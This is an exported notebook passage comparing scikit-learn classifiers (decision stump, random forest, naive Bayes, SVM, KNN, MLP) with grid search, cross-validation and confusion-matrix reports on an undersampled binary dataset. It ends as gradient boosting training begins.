The entire notebook runtime so far is 5 minutes
Decision Stump is a special case of the Decision Tree classifier with max_depth=1
The term "Decision Stump" typically refers to a decision tree with only one level, meaning it makes decisions based on a single feature.
The main hyperparameters for a decision stump are usually the splitting criterion and the choice of the feature to split on.
However, since decision stumps are simple, there might not be a lot of hyperparameters to optimize compared to more complex models.
# check to see if there is any benefit to using Decision Stump instead of Decision Tree
if (accuracy_ds_undersampled_unoptimized < accuracy_dt_undersampled_unoptimized):
print(f"NOTE: Decision Stump is a special case of Decision Tree with max_depth=1, but does not seem to be beneficial for this dataset.")
print(f"Decision Tree accuracy is {accuracy_dt_undersampled_unoptimized*100:.2f}%, while Decision Stump accuracy is only {accuracy_ds_undersampled_unoptimized*100:.2f}%")
NOTE: Decision Stump is a special case of Decision Tree with max_depth=1, but does not seem to be beneficial for this dataset. Decision Tree accuracy is 93.05%, while Decision Stump accuracy is only 0.00%
# Create an instance of the DecisionTreeClassifier model
clf = DecisionTreeClassifier(max_depth=1)
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ds_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'ccp_alpha': 0.0, 'class_weight': None, 'criterion': 'gini', 'max_depth': 1, 'max_features': None, 'max_leaf_nodes': None, 'min_impurity_decrease': 0.0, 'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
Accuracy: 0.8261245674740484
Confusion matrix
[[2397 142]
[ 461 468]]
True Negatives (TN) = 2397
False Positives (FP) = 142
False Negatives (FN) = 461
True Positives (TP) = 468
Accuracy: 0.8261245674740484
Sensitivity: 0.503767491926803
Specificity: 0.9440724694761717
Geometric Mean: 0.6896325254402915
Precision: 0.8195490764251806
Recall: 0.8261245674740484
f1-score: 0.8132429589660275
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.8387 0.9441 0.8883 2539
1 0.7672 0.5038 0.6082 929
accuracy 0.8261 3468
macro avg 0.8030 0.7239 0.7482 3468
weighted avg 0.8195 0.8261 0.8132 3468
Current Time: 2024-01-02 18:52:56
The entire notebook runtime so far is 5 minutes
Remember that decision stumps are very simple models, and hyperparameter tuning might not have as much impact as it would on more complex models. It's always a good practice to experiment and validate the performance on a validation set or through cross-validation.
# Create an instance of the DecisionTreeClassifier model with max_depth=1
clf = DecisionTreeClassifier(max_depth=1)
# Define the hyperparameters to tune
param_grid = {
'criterion': ['gini', 'entropy'],
'max_depth': [1],
'min_samples_split': [2, 5, 10],
'min_samples_leaf': [1, 2, 4],
'random_state': [42] #for reproducible results
}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count,n_jobs=-1)
# Fit the grid search to the training data
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of the model with the best hyperparameters
clf = DecisionTreeClassifier(**best_params)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = accuracy_score(y_test_label, y_pred)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ds_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_ds = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Best Parameters: {'criterion': 'gini', 'max_depth': 1, 'min_samples_leaf': 1, 'min_samples_split': 2, 'random_state': 42}
Best Scores: 0.7362648700083303
Cross validation scores: [0.7414248 0.73350923 0.70937913 0.75561427 0.76089828 0.71334214
0.74636724 0.72919419 0.74504624 0.72787318]
Mean cross validation score: 0.7362648700083303
Standard Deviation cross validation score: 0.016010316842677078
Accuracy: 0.8261245674740484
Confusion matrix
[[2397 142]
[ 461 468]]
True Negatives (TN) = 2397
False Positives (FP) = 142
False Negatives (FN) = 461
True Positives (TP) = 468
Accuracy: 0.8261245674740484
Sensitivity: 0.503767491926803
Specificity: 0.9440724694761717
Geometric Mean: 0.6896325254402915
Precision: 0.8195490764251806
Recall: 0.8261245674740484
f1-score: 0.8132429589660275
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.8387 0.9441 0.8883 2539
1 0.7672 0.5038 0.6082 929
accuracy 0.8261 3468
macro avg 0.8030 0.7239 0.7482 3468
weighted avg 0.8195 0.8261 0.8132 3468
Current Time: 2024-01-02 18:52:57
The entire notebook runtime so far is 5 minutes
# check to see if there is any benefit to using Decision Stump instead of Decision Tree
if (accuracy_ds_undersampled_optimized < accuracy_dt_undersampled_optimized):
print(f"NOTE: Decision Stump is a special case of Decision Tree with max_depth=1, but does not seem to be beneficial for this dataset.")
print(f"Decision Tree accuracy is {accuracy_dt_undersampled_optimized*100:.2f}%, while Decision Stump accuracy is only {accuracy_ds_undersampled_optimized*100:.2f}%")
NOTE: Decision Stump is a special case of Decision Tree with max_depth=1, but does not seem to be beneficial for this dataset. Decision Tree accuracy is 95.62%, while Decision Stump accuracy is only 82.61%
# Create an instance of the RandomForestClassifier model
clf = RandomForestClassifier(n_jobs=-1, random_state=42)
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_rf_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'bootstrap': True, 'ccp_alpha': 0.0, 'class_weight': None, 'criterion': 'gini', 'max_depth': None, 'max_features': 'sqrt', 'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100, 'n_jobs': -1, 'oob_score': False, 'random_state': 42, 'verbose': 0, 'warm_start': False}
Accuracy: 0.9512687427912342
Confusion matrix
[[2425 114]
[ 55 874]]
True Negatives (TN) = 2425
False Positives (FP) = 114
False Negatives (FN) = 55
True Positives (TP) = 874
Accuracy: 0.9512687427912342
Sensitivity: 0.9407965554359526
Specificity: 0.9551004332414337
Geometric Mean: 0.9479215145194917
Precision: 0.9528544476833208
Recall: 0.9512687427912342
f1-score: 0.9517322239848077
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9778 0.9551 0.9663 2539
1 0.8846 0.9408 0.9118 929
accuracy 0.9513 3468
macro avg 0.9312 0.9479 0.9391 3468
weighted avg 0.9529 0.9513 0.9517 3468
Current Time: 2024-01-02 18:52:58
The entire notebook runtime so far is 5 minutes
# Create an instance of the RandomForestClassifier model
clf = RandomForestClassifier(n_jobs=-1)
# Define the hyperparameters to tune
param_grid = {
'n_estimators': [100, 200, 300],
'max_depth': [5, 10],
'random_state': [42] #for reproducible results
}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, n_jobs=-1)
# Fit the grid search to the training data
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of the model with the best hyperparameters
clf = RandomForestClassifier(**best_params)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_rf_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_rf = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Best Parameters: {'max_depth': 10, 'n_estimators': 100, 'random_state': 42}
Best Scores: 0.9420206480936066
Cross validation scores: [0.95118734 0.9525066 0.94187583 0.95376486 0.94319683 0.92866579
0.92998679 0.94451783 0.94187583 0.9326288 ]
Mean cross validation score: 0.9420206480936066
Standard Deviation cross validation score: 0.008665702642491632
Accuracy: 0.9524221453287197
Confusion matrix
[[2445 94]
[ 71 858]]
True Negatives (TN) = 2445
False Positives (FP) = 94
False Negatives (FN) = 71
True Positives (TP) = 858
Accuracy: 0.9524221453287197
Sensitivity: 0.9235737351991389
Specificity: 0.9629775502166207
Geometric Mean: 0.9430698664290365
Precision: 0.9528898391863994
Recall: 0.9524221453287197
f1-score: 0.9526047869117483
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9718 0.9630 0.9674 2539
1 0.9013 0.9236 0.9123 929
accuracy 0.9524 3468
macro avg 0.9365 0.9433 0.9398 3468
weighted avg 0.9529 0.9524 0.9526 3468
Current Time: 2024-01-02 18:53:17
The entire notebook runtime so far is 5 minutes
# Create an instance of the model
#clf = GaussianNB() # suitable for continuous features
#clf = MultinomialNB() # used for discrete data like word counts
clf = BernoulliNB() # suitable for binary data, gives best accuracy for this dataset
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_nb_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'alpha': 1.0, 'binarize': 0.0, 'class_prior': None, 'fit_prior': True, 'force_alpha': 'warn'}
Accuracy: 0.7673010380622838
Confusion matrix
[[2098 441]
[ 366 563]]
True Negatives (TN) = 2098
False Positives (FP) = 441
False Negatives (FN) = 366
True Positives (TP) = 563
Accuracy: 0.7673010380622838
Sensitivity: 0.6060279870828849
Specificity: 0.8263095706971249
Geometric Mean: 0.7076487305414327
Precision: 0.7735878907190631
Recall: 0.7673010380622838
f1-score: 0.7700711781503033
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.8515 0.8263 0.8387 2539
1 0.5608 0.6060 0.5825 929
accuracy 0.7673 3468
macro avg 0.7061 0.7162 0.7106 3468
weighted avg 0.7736 0.7673 0.7701 3468
Current Time: 2024-01-02 18:53:17
The entire notebook runtime so far is 5 minutes
# Create an instance of the model
clf = BernoulliNB()
# Define the hyperparameters to tune
# skip the sigmoid and poly kernels, rarely used
param_grid = {'alpha': [0.1, 0.01, 0.001, 0.0001]}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, n_jobs=-1)
# Fit the grid search to the training data
print("Performing GridSearchCV")
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of model with the best hyperparameters
clf = BernoulliNB(**best_params)
# Fit the model to the training data
print("Fitting the model")
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_nb_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_nb = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Performing GridSearchCV
Best Parameters: {'alpha': 0.1}
Best Scores: 0.7275476380518852
Fitting the model
Cross validation scores: [0.73218997 0.73218997 0.71202114 0.74768824 0.74372523 0.69484808
0.72919419 0.74108322 0.74108322 0.7014531 ]
Mean cross validation score: 0.7275476380518852
Standard Deviation cross validation score: 0.01752385248568137
Accuracy: 0.7678777393310265
Confusion matrix
[[2100 439]
[ 366 563]]
True Negatives (TN) = 2100
False Positives (FP) = 439
False Negatives (FN) = 366
True Positives (TP) = 563
Accuracy: 0.7678777393310265
Sensitivity: 0.6060279870828849
Specificity: 0.8270972823946435
Geometric Mean: 0.7079859470154406
Precision: 0.7739759181239302
Recall: 0.7678777393310265
f1-score: 0.7705725432085907
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.8516 0.8271 0.8392 2539
1 0.5619 0.6060 0.5831 929
accuracy 0.7679 3468
macro avg 0.7067 0.7166 0.7111 3468
weighted avg 0.7740 0.7679 0.7706 3468
Current Time: 2024-01-02 18:53:17
The entire notebook runtime so far is 5 minutes
# Create an instance of the model
clf = SVC()
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_svm_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': 0.0, 'decision_function_shape': 'ovr', 'degree': 3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1, 'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
Accuracy: 0.8771626297577855
Confusion matrix
[[2364 175]
[ 251 678]]
True Negatives (TN) = 2364
False Positives (FP) = 175
False Negatives (FN) = 251
True Positives (TP) = 678
Accuracy: 0.8771626297577855
Sensitivity: 0.7298170075349839
Specificity: 0.931075226467113
Geometric Mean: 0.824326716520935
Precision: 0.8747701295675053
Recall: 0.8771626297577855
f1-score: 0.8754488715059536
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9040 0.9311 0.9173 2539
1 0.7948 0.7298 0.7609 929
accuracy 0.8772 3468
macro avg 0.8494 0.8304 0.8391 3468
weighted avg 0.8748 0.8772 0.8754 3468
Current Time: 2024-01-02 18:53:21
The entire notebook runtime so far is 5 minutes
print("WARNING: SVM hyperparameter optimization is very CPU-intensive, this will take some time...")
WARNING: SVM hyperparameter optimization is very CPU-intensive, this will take some time...
# Create an instance of the model
clf = SVC()
# Define the hyperparameters to tune
# skip the sigmoid and poly kernels, rarely used
param_grid = {
'C': [0.1, 1, 10],
'kernel': ['rbf', 'linear'],
'probability': [True], #probability=True is required for VotingClassifier
'random_state': [42] #for reproducible results
}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, n_jobs=-1)
# Fit the grid search to the training data
print("Performing GridSearchCV")
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of model with the best hyperparameters
clf = SVC(**best_params)
# Fit the model to the training data
print("Fitting the model")
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_svm_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_svm = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Performing GridSearchCV
Best Parameters: {'C': 10, 'kernel': 'rbf', 'probability': True, 'random_state': 42}
Best Scores: 0.8497080894936616
Fitting the model
Cross validation scores: [0.86279683 0.8469657 0.84412153 0.85336856 0.85733157 0.83751651
0.86129458 0.83619551 0.85204756 0.84544254]
Mean cross validation score: 0.8497080894936616
Standard Deviation cross validation score: 0.008778959925939406
Accuracy: 0.8777393310265282
Confusion matrix
[[2347 192]
[ 232 697]]
True Negatives (TN) = 2347
False Positives (FP) = 192
False Negatives (FN) = 232
True Positives (TP) = 697
Accuracy: 0.8777393310265282
Sensitivity: 0.7502691065662002
Specificity: 0.924379677038204
Geometric Mean: 0.8327865959652604
Precision: 0.8762858632576085
Recall: 0.8777393310265282
f1-score: 0.8768720965336891
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9100 0.9244 0.9172 2539
1 0.7840 0.7503 0.7668 929
accuracy 0.8777 3468
macro avg 0.8470 0.8373 0.8420 3468
weighted avg 0.8763 0.8777 0.8769 3468
Current Time: 2024-01-02 19:06:35
The entire notebook runtime so far is 18 minutes
# Create an instance of the model with the desired number of neighbors (you can adjust n_neighbors)
clf = KNeighborsClassifier(n_neighbors=5) # You can change the value of n_neighbors as needed
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_knn_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'algorithm': 'auto', 'leaf_size': 30, 'metric': 'minkowski', 'metric_params': None, 'n_jobs': None, 'n_neighbors': 5, 'p': 2, 'weights': 'uniform'}
Accuracy: 0.8408304498269896
Confusion matrix
[[2205 334]
[ 218 711]]
True Negatives (TN) = 2205
False Positives (FP) = 334
False Negatives (FN) = 218
True Positives (TP) = 711
Accuracy: 0.8408304498269896
Sensitivity: 0.7653390742734123
Specificity: 0.8684521465143757
Geometric Mean: 0.8152670494163677
Precision: 0.8485118077576769
Recall: 0.8408304498269896
f1-score: 0.8436466574347156
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9100 0.8685 0.8888 2539
1 0.6804 0.7653 0.7204 929
accuracy 0.8408 3468
macro avg 0.7952 0.8169 0.8046 3468
weighted avg 0.8485 0.8408 0.8436 3468
Current Time: 2024-01-02 19:06:35
The entire notebook runtime so far is 18 minutes
# Create an instance of the model
clf = KNeighborsClassifier()
# Define the hyperparameters to tune
param_grid = {
'n_neighbors': [5,10,15,20,30],
'weights': ['uniform', 'distance']
}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, n_jobs=-1)
# Fit the grid search to the training data
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of the model with the best hyperparameters
clf = KNeighborsClassifier(**best_params)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_knn_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_knn = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Best Parameters: {'n_neighbors': 10, 'weights': 'uniform'}
Best Scores: 0.8402005207334883
Cross validation scores: [0.85488127 0.82717678 0.83883752 0.84940555 0.85072655 0.8322325
0.8348745 0.81505945 0.84676354 0.85072655]
Mean cross validation score: 0.8400684203371871
Standard Deviation cross validation score: 0.012083688738635447
Accuracy: 0.881199538638985
Confusion matrix
[[2373 166]
[ 246 683]]
True Negatives (TN) = 2373
False Positives (FP) = 166
False Negatives (FN) = 246
True Positives (TP) = 683
Accuracy: 0.881199538638985
Sensitivity: 0.7351991388589881
Specificity: 0.9346199291059473
Geometric Mean: 0.8289341150170747
Precision: 0.8788559362046768
Recall: 0.881199538638985
f1-score: 0.8794481532413949
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9061 0.9346 0.9201 2539
1 0.8045 0.7352 0.7683 929
accuracy 0.8812 3468
macro avg 0.8553 0.8349 0.8442 3468
weighted avg 0.8789 0.8812 0.8794 3468
Current Time: 2024-01-02 19:06:38
The entire notebook runtime so far is 19 minutes
MLPClassifier is a class in scikit-learn that represents a Multi-layer Perceptron (MLP) classifier, which is a type of artificial neural network.
An MLP is a feedforward neural network that consists of multiple layers of nodes (neurons) and can learn complex patterns and relationships in data.
The MLPClassifier is specifically designed for classification tasks.
Example of all hyperparameters:
mlp_classifier = MLPClassifier(
hidden_layer_sizes=(100, 50), # Architecture of hidden layers
activation='relu', # Activation function ('relu' is common)
solver='adam', # Optimization solver
alpha=0.0001, # L2 penalty (regularization)
batch_size='auto', # Size of mini-batches ('auto' is adaptive)
learning_rate='constant', # Learning rate schedule
learning_rate_init=0.001, # Initial learning rate
max_iter=500, # Maximum number of iterations
shuffle=True, # Shuffle data in each iteration
random_state=42, # Random seed for reproducibility
verbose=True # Print progress during training
)
# Create an instance of the model
clf = MLPClassifier(random_state=42)
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_mlp_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'activation': 'relu', 'alpha': 0.0001, 'batch_size': 'auto', 'beta_1': 0.9, 'beta_2': 0.999, 'early_stopping': False, 'epsilon': 1e-08, 'hidden_layer_sizes': (100,), 'learning_rate': 'constant', 'learning_rate_init': 0.001, 'max_fun': 15000, 'max_iter': 200, 'momentum': 0.9, 'n_iter_no_change': 10, 'nesterovs_momentum': True, 'power_t': 0.5, 'random_state': 42, 'shuffle': True, 'solver': 'adam', 'tol': 0.0001, 'validation_fraction': 0.1, 'verbose': False, 'warm_start': False}
Accuracy: 0.8788927335640139
Confusion matrix
[[2349 190]
[ 230 699]]
True Negatives (TN) = 2349
False Positives (FP) = 190
False Negatives (FN) = 230
True Positives (TP) = 699
Accuracy: 0.8788927335640139
Sensitivity: 0.7524219590958019
Specificity: 0.9251673887357227
Geometric Mean: 0.8343358191544217
Precision: 0.8774562695368183
Recall: 0.8788927335640139
f1-score: 0.8780336805286544
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9108 0.9252 0.9179 2539
1 0.7863 0.7524 0.7690 929
accuracy 0.8789 3468
macro avg 0.8485 0.8388 0.8435 3468
weighted avg 0.8775 0.8789 0.8780 3468
Current Time: 2024-01-02 19:06:41
The entire notebook runtime so far is 19 minutes
#mlp_classifier = MLPClassifier(hidden_layer_sizes=(100, 50), max_iter=500, random_state=42)
# Create an instance of the model
clf = MLPClassifier()
# Define the hyperparameters to tune
param_grid = {
'hidden_layer_sizes': [(100, 50), (50, 25), (150, 100)], #tuples for hidden layers
'max_iter': [300, 500, 800],
'alpha': [0.0001, 0.001, 0.01],
'random_state': [42] #for reproducible results
}
# other exaples to use in param_grid for testing
#param_grid = {
# 'hidden_layer_sizes': [(50, 25), (100, 50), (100, 100)],
# 'activation': ['relu', 'tanh'],
# 'alpha': [0.0001, 0.001, 0.01],
# 'learning_rate': ['constant', 'adaptive'],
# 'max_iter': [200, 300, 500],
#}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, n_jobs=-1)
# Fit the grid search to the training data
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of the model with the best hyperparameters
clf = MLPClassifier(**best_params)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_mlp_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_mlp = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Best Parameters: {'alpha': 0.01, 'hidden_layer_sizes': (150, 100), 'max_iter': 300, 'random_state': 42}
Best Scores: 0.8505006918714686
Cross validation scores: [0.86807388 0.84168865 0.84676354 0.85997358 0.85204756 0.83883752
0.85468956 0.84808454 0.84280053 0.85204756]
Mean cross validation score: 0.8505006918714686
Standard Deviation cross validation score: 0.008447857613541837
Accuracy: 0.8786043829296425
Confusion matrix
[[2341 198]
[ 223 706]]
True Negatives (TN) = 2341
False Positives (FP) = 198
False Negatives (FN) = 223
True Positives (TP) = 706
Accuracy: 0.8786043829296425
Sensitivity: 0.759956942949408
Specificity: 0.9220165419456479
Geometric Mean: 0.8370739946777699
Precision: 0.8776524432689344
Recall: 0.8786043829296425
f1-score: 0.8780738983802362
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9130 0.9220 0.9175 2539
1 0.7810 0.7600 0.7703 929
accuracy 0.8786 3468
macro avg 0.8470 0.8410 0.8439 3468
weighted avg 0.8777 0.8786 0.8781 3468
Current Time: 2024-01-02 19:10:36
The entire notebook runtime so far is 22 minutes
XGboost and gradient boosting are both ensemble learning models Gradient boosting is built into sklearn, but xgboost needs to install its own package Let's start with gradient boosting
model = GradientBoostingClassifier( n_estimators=100, # Number of boosting stages (trees) learning_rate=0.1, # Step size shrinkage to prevent overfitting max_depth=3, # Maximum tree depth random_state=42 # Seed for reproducibility )
# Create an instance of the model
clf = GradientBoostingClassifier(random_state=42)
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_gb_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
